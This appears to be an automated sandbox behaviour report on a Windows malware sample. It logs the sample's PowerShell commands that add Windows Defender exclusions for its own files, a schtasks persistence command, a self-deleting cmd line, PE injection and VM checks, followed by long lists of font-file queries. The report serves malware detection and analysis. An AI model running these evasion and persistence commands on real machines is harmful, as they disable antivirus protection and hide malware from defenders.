Source: ywKvCTGbQjXP.exe, 00000009.00000002.1781454338.0000000007EA2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe"
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Memory written: C:\Users\user\Desktop\VQsnGWaNi5.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Memory written: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpEED9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Users\user\Desktop\VQsnGWaNi5.exe "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\Desktop\VQsnGWaNi5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ywKvCTGbQjXP" /XML "C:\Users\user\AppData\Local\Temp\tmpD53.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Roaming\ywKvCTGbQjXP.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /C Y /N /D Y /T 3

Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Users\user\Desktop\VQsnGWaNi5.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\VQsnGWaNi5.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
